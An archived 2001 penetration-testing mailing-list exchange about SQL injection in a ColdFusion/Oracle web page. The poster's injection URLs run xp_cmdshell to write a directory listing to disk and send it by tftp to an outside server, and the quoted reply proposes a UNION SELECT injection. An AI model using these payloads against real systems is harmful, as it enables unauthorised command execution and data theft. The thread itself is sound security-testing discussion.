Penetration Testing mailing list archives
Re: CFM SQL injection
From: "Charlie Liserne" <Chili () SexMagnet com>
Date: Mon, 24 Dec 2001 20:13:57 +0100
Hi, I'm trying to get the C:/ directory, but I'm not able to do that. This is a non-intrusive pen-test, so I wouldn't like to have to exec something like: http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'dir *.* > c:\listing.txt' --' http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'tftp listing.txt my.server' --' I would like to get a listing of the c: directory in a clean way, without writing to disk, and get the results appearing in my web browser. I know some column names, but I can't figure how could be possible read or modify it. Also, I'm not able to get a list of the directory; The ' escape character isn't necesary, but when i do: http://www.server.es/page.cfm?page_id=12; EXEC master..xp_cmdshell 'dir'; The response is: ODBC Error Code = S1000 (General error) [Oracle][ODBC][Ora]ORA-00911: invalid character Where are the invalid character?? How could be possible to take advantage from a coldfusion error programming? Sometime ago, in this mailing list appears a message from Rick Redman (Minga), speaking about how easy is to break into a Coldfusion app if the programmer aren't 100% trained in secure coding practices. I was searching in the Internet about this, and how to take advantage of the programming errors, but I can't figure out how to pervert a cfm application. Do you know if there are any document about this? Best Regards, Charlie. *********** REPLY SEPARATOR ***********
It looks like the query that you're attacking isn't prepending and appending quotes to your input. The string build probably looks a lil' sumthin' like this: Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID
=
" & strPageID This means that there is no need to use quotes in order to perform a successful injection. So, try something like this: http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM OtherTable WHERE 1=1 Hopefully this will return an error complaining about an invalid table name, or at least another error that may give you a better idea of what
the
web application is doing with your argument.
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- SQL INJECTION - ORACLE foo bar (Dec 10)
- Re: SQL INJECTION - ORACLE Michael Haunzwickl (Dec 10)
- CFM SQL injection Charlie Liserne (Dec 17)
- Re: CFM SQL injection Kevin Spett (Dec 19)
- Re: CFM SQL injection Charlie Liserne (Dec 24)
- CFM SQL injection Charlie Liserne (Dec 17)
- Re: SQL INJECTION - ORACLE Michael Haunzwickl (Dec 10)
- Re: SQL INJECTION - ORACLE Kevin Spett (Dec 10)